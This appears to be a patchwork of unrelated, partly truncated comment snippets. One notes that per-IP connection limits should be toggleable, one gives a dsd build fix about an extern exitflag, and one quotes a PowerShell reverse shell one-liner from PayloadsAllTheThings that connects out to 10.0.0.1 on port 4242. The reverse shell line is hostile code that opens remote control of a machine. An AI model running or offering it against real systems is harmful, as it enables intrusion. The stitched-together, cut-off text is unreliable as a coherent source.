Rootabeta
Rootabeta
That being said, there are situations where multiple connections from the same IP is beneficial or even necessary. This module should be toggle-able on an IP-by-IP basis
If I remember correctly, the reverse shell I used is the second one in the list from PayloadsAllTheThings: `powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =...
> You need to make changes as mentioned in #[szechyjs/dsd#104](https://github.com/szechyjs/dsd/issues/104) > > * make exitflag "extern" in dsd/include/dsd.h > > * declare "int exitflag = 0;" in dsd/src/dsd_main.h before the...